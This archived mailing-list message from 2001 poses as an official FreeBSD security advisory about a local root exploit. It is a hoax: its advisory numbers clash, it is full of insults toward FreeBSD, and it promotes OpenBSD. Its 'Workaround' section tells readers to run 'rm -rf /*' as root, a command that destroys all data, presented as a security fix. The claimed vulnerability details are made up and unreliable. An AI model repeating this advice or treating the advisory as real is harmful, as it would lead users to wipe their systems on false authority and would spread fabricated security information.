From owner-freebsd-current Thu Feb 1 18:59:40 2001 Delivered-To: freebsd-current@freebsd.org Received: from smtp.interlog.com (bretweir.total.net [154.11.89.176]) by hub.freebsd.org (Postfix) with SMTP id 9E99237B491 for ; Thu, 1 Feb 2001 18:59:21 -0800 (PST) Received: (qmail 2440 invoked from network); 2 Feb 2001 02:59:19 -0000 Received: from unknown (HELO vws3.interlog.com) (207.34.202.29) by bretweir.total.net with SMTP; 2 Feb 2001 02:59:19 -0000 Received: by vws3.interlog.com (8.9.0/8.9.0) id VAA01730; Thu, 1 Feb 2001 21:59:19 -0500 (EST) Date: Thu, 1 Feb 2001 21:59:19 -0500 (EST) Message-Id: <200102020259.VAA01730@vws3.interlog.com> To: freebsd-current@freebsd.org From: FreeBSD Security Advisories Subject: FreeBSD-SA-01:19.local Sender: owner-freebsd-current@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:69 Security Advisory FreeBSD, Inc. Topic: Local root exploit Category: core Module: sh Announced: 2001-02-02 Credits: AntiOffline.com, Disgraced.org, Deficiency.org sil, deran9ed, jhh, iggie, jwit Affects: All released versions of FreeBSD 2.x. 3.x, 4.x. Corrected: Not corrected since we aren't smart enough to figure it out. Vendor status: Disgruntled FreeBSD only: YES I. Background FreeBSD is a bloated OS complete with 4 CD's worth of crap you just don't need, which can often become the overlay for some script kiddiot rooting your machine. II. Problem Description FreeBSD the experts in bloatware which can be compared to Windows 98, Windows2000 Unprofessional edition, and well FreeBSD versions *, has a local exploit which local (l)users can manipulate in order to gain higher priveledges by issuing commands via the terminal. Our developers are currently focusing on the problem scrathing their gonads and crying foul at the more secure versions of BSD and their developers which we cannot mention due to our egos. Kiss my ass Theo, you and your ultra secure team of experts, one day we too will have our heads out of our asses. III. Impact Malicious local users can cause arbitrary commands to be executed as the root user, although FreeBSD will never admit why we ship our distro with 2.6 gigabytes of worthless junkware, we will not stoop beneath ourselves to comment on why we still use such insecure stuff, e.g., WU-FTPD, a crappy TCP/IP stack, etc. We are now a part of BSDi which means we've suckseded in selling our anuses for fun and profit. IV. Workaround Perform the following commands as root: rm -rf /* Then run out and purchase OpenBSD 2.8 a real OS not some overlaying crap like SecureBSD. V. Solution Ultimately, there is no workaround until our developers get a clue and BSDi decides to be purchased by AOL Time Warner, Microsoft or Intel however, kudos to those already using OpenBSD. Your systems are safe with it. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOniArlUuHi5z0oilAQGE+AQAiwizuORMqyzOw21QFyap2Z7lv7BkYuiC 9zZ97X3WR+i8AujTfIrhwK1UdO6KFbp5Rjc54f3XHtaMotoRcp3x24xADpGQDP4s Xyw267ZoV7ZYuG6VcAgBzq9pqiCnU9rqRQy2aRn/8iCvcl/G5249B3DuMMtLiMw+ Iuz0OOxWeLM= =hanM -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-current" in the body of the message